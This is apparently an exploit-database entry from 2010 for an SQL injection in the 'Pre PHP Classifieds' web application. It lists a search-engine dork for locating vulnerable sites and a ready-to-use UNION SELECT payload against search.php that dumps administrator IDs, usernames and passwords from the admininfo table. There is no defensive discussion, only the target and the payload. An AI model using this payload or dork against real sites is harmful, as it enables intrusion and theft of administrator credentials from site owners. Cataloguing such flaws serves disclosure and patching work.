[] NeoSense

Pre PHP Classifieds - SQL Injection

Author: Sangteamtham
type: webapps
platform: php
port: 
date_added: 2010-06-22 
date_updated: 2010-06-22 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

> #######################################################################
> # Source: PHP Classifieds SQL injection Vulnerability
> # Download: http://preproject.com/products.asp
> # Dork : Power by PHP Classifieds
> # Author: Sangteamtham@gmail.com
> #
> #######################################################################

Exploit:
http://localhost/clas/search.php?category=999999 UNION SELECT
group_concat(adminid,0x3a,username,0x3a,password) from admininfo--